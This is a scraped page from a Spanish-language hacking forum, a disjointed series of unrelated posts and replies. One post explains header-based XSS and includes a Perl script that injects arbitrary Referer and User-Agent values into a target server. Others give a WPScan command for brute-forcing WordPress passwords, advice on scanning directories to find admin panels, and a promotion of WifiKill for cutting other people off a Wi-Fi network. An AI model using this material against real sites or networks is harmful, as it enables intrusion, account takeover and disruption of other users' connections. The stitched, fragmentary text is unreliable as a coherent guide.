You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
No anda el link, no lo puedes suvir en otro servidor , o alguien qe lo haya descargado qe me lo pase, gracias!!

Funciona perfecto...

Buen aporte, te lo muevo a la sección correcta y añadí la etiqueta CODE para que se lea mejor.

La fundamentacion de este tipo de errores XSS se encuentra en el texto "Header Based Exploitation" de Zenomorph-CGISecurity, cuyo enlace puede
encontrarse al final de este articulo, en el apartado de enlaces y recursos.

Al establecerse una comunicación HTTP, como en todas, existe un intercambio de datos. El cliente le dice al servidor que quiere que se le muestre página, que la interfaz de su navegador esta en castellano, que su navegador es tal, que acepta x tipos de archivo, y que proviene de x sitio, por ejemplo. Logicamente la mayor parte de ese intercambio se produce automaticamente entre el navegador y el servidor, teniendo el usuario unicamente, la posibilidad de decidir que es lo que quiere del servidor (que se le muestre x pagina).

Muchas páginas usan algunos datos de la sesión HTTP del usuario para mostrarlos como sistemas de registro, estadisticas, o un simple mensaje tipo "Su navegador es: (direccion)" o "Usted proviene de: (referer)" entre muchas otras cosas.

El problema se plantea si un usuario con malas ideas inicia una sesion con el servidor, siendo el mismo el que intercambie los datos con el servidor, e introduciendo los datos que a el le de la gana (HTML, JS...).

# telnet xxx 80

Trying xxx...
Connected to xxx.

Escape character is '^]'.

GET index.html HTTP/1.0
Referer:
User-agent:

<...>

Aqui os pongo un simple codigo ilustrativo cuya funcion es inyecta los datos de USER-AGENT y HTTP-REFERER especificados por el usuario desde la linea de comandos. La labor de ver si la pagina no filtra debera ser manual.

header_xss.pl

#!/usr/bin/perl -w

# XSS-HEADER injector

# Prueba de concepto sin estar probada :)
# taseh'03

use IO::Socket;

my $host = @argv[0];
my $inject = @argv[1];
my $inj3ct = @argv[2];
my $gett = "/"; # cambiar por lo que queremos que se reclame... :)

if (@argv < 2){

print "\n\n{jumi [*3] [http://www.govannom.org/seguridad/web_cgi/xss_taseh.txt]} - XSS-Header injector -prueba de concepto-";
print "\nUso: {jumi [*3] [http://www.govannom.org/seguridad/web_cgi/xss_taseh.txt]}   ";
exit;

}

print "Conectando con $host...";
my $socket = IO::Socket::INET->new(
	Proto => 'tcp',
	PeerAddr => $host,
	PeerPort => "80", or die"\n\nNo puedo conectar con $server";
                   # ^^ cambiar puerto si es distinto :)
}

$socket->autoflush(1);
print $socket "GET $gett HTTP/1.0\n";
print $socket "Host: $host\n";
print $socket "Referer: $inject\n"; # inyecta referer falseado
print $socket "User-Agent: $inj3ct\n\n"; # inyecta cli.id falseado

print "\nInyeccion finalizada :).\n";

close $socket;

exit; 

Bien, para comprobar si la cadena que queriamos inyectar ha sido realmente inyectada en la pagina de salida basta con visitarla o bajarnosla y hacer un cat pagina.html | grep  y ver si esta o simplemente visualizarla y ver el efecto de nuestro codigo inyectado.

Fuente You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ahora lo leo, gracias por el aporte bro

Aqui les dejo este curso de cracking hecho por raton, es excelente está todo muy bien explicado y encima cada capitulo viene con su programa.
Que lo disfruten.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  (Link corregido)


Fuente: elhacker

A ver, es simple, una vez que introdugiste la dirección de la web a scannear, te tira una lista de directorios. De todos eses directorios tienes que ver
cual es el que puede ser el panel de administración, no te indica directamente cual es. Solo te suelta todos los directorios.

EDITO: O sino busca el robots.txt, ahi puede aparecer la dirección del admin panel.

Usa el dirbuster

Cierro hilo, lo desviaron del tema principal.

Muy bueno CalebBucker, sigue así crack.

Cocoa Packet Analyzer es un sniffer nativo para Mac OS X (>10.5) que desde noviembre de 2011 se encuentra en su versión 1.11.  Entre sus características permite leer y escribir ficheros en PCAP, lo que realmente no es ninguna novedad, y algunos protocolos básicos de TCP/IP.

Adicionalmente es mejorado mediante plugins, de los que hay disponibles tan solo dos: SIP y IAX2

Al arrancarlo permite leer de un fichero un captura o crear una nueva, indicando el interfaz por el que realizar la escucha.



Cuando termina (y no en tiempo real), muestra los resultados en una ventana similar a Wireshark. Aunque como se puede ver en la siguiente captura de pantalla, no permite seguir el flujo de una conexión, ni entiende protocolos de capa 7.



Pese a que visualmente se agradece que esté desarrollado nativamente, las funcionalidades son extremadamente limitadas. Aun está demasiado verde como para plantearse sustituir otros sniffers mucho más avanzados como Wireshark o incluso el propio tcpdump.

Esperemos que continúen ampliandolo y ya veremos dentro de un tiempo si está algo más maduro.

DESCARGA: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  
  FUENTE: securitybydefault

Muy buen aporte, sinceramente no sabía ni que se podía....

Buen aporte, lo muevo a Bugs y  Exploits que está mejor alli.
Un saludo y gracias!

Buen aporte, le pongo chincheta.

Hay muchas. Para SQLi: SQLmap, SQLhelper, The Mole...
                     Para XSS: XSSer, XSS-proxy...
Hay mas, pero me da perreza ponerlas...
No te recomiendo que uses tools automáticas, lo mejor es hacerlo manual todo, asi aprendes algo.

Hola,

Hoy les traigo un pequeño análisis que le hice a este packer y bueno, también lo desempacamos!
Es mi primer unpacking y espero sepan disculparme los errores técnicos que dicho documento pueda tener.

Disfrutadlo!

Descarga:

https://dl.dropbox.com/u/26610132/Estudio%20y%20desempaquetado%20RDG%20PolyPack%20por%20The%20Swash.rar


Un saludo,
Iván Portilla.

Fuente: Indetectables.
Autor: TheSwash

La herramienta está escrita en Ruby y permite encontrar vulnerabilidades en los plugins instalados. Para ello WPScan buscará entre los 2220 plugins más populares y nos listará las vulnerabilades encontradas en base a las versiones. Además, y entre otras cosas, es capaz de listarnos los usuarios, versión de WordPress, nombre del theme activo, directorios, ...

Su uso es muy sencillo y su sintaxis está muy bien explicada en su menú de ejecución:

./wpscan.rb

Como ya he comentado más arriba tiene múltiples opciones, sobretodo y quizas la más interesante, el listado de plugins con sus respectivas vulnerabilidades. Tampoco hay que dejar en el olvido el listado de usuarios o versión de WordPress ya que puede ser de gran utilidad para comprobar la seguridad del sitio.

Ejecutar un análisis de vulnerabilidad en los plugins instalados es tan sencillo como lanzar el siguiente comando:

./wpscan.rb --url http://www.lawebquesea.com --enumerate p

Se puede observar en este ejemplo que no se ha detectado ninguna vulnerabilidad en los plugins instalados, sin embargo se ha detectado un directory listing en la carpeta de uno de los plugins. Es recomendable contrastar los resultados ya que es posible obtener falsos positivos.

La herramienta también es capaz de realizar ataques a usuarios por fuerza bruta. Es necesario indicar la ruta de nuestro diccionario de passwords, así como el username de WordPress.

./wpscan.rb --url http://www.lawebquesea.com --wordlist /larutadel/diccionario.txt 
--username elnombredeusuario

WPScan está incluida en la distribución linux de seguridad informática, Backtrack 5. También es posible su descarga desde el sitio para desarrolladores que ofrece Google, WPScan Worpress Security Scanner.

FUENTE: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si estás usando WifI en tu casa o en tu oficina y estás teniendo problemas como que alguien está conectado a tu red para navegar por internet, si alguien hackea tu red o si no quieres que alguien use una red mientras está usando todo el ancho de banda, puedes expulsarlos con esta herramienta.
Consideremos otro ejemplo. Si tu estás usando internet en tu dispositivo Android mientras estés en un lugar público como en una cafetería, en una estación o otro lugar en el que quieras usar internet pero la conexión sea lenta porque mucha gente diferente esté usando la misma red.
Ahora tenemos una maravillosa aplicación Android para  usuarios root, haciendo que puedas cortar la conexión de la red de otra gente que tú quieras


¿Qué es WiFi Kill para Android?

WifiKill te permite escanear tu red wifi desde dispositivos, ver su proveedor y cortar la conexión de red para dispositivos específicos. De esta forma tu puedes deshacerte de moradores de tu red...



Descarga y videotutorial para WifiKill

Esta aplicación estaba disponible en el Market de Android pero ahora han eliminado la aplicación, sin embargo tenemos otro link desde donde puedes descargar la aplicación y un videotutorial de WiFiKill para Android.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente original: ehacking
Traducido por Pr0ph3t.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Version 1.8 Disponible:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Añadido

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tela hasta que das con el link, lo resubo a mi cuenta de mediafire por si alguien lo quiere...

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Lo actualicé, gracias

No entiendo lo de usuario y contraseña por defecto... En las webs no se hace eso, eso es en los routers...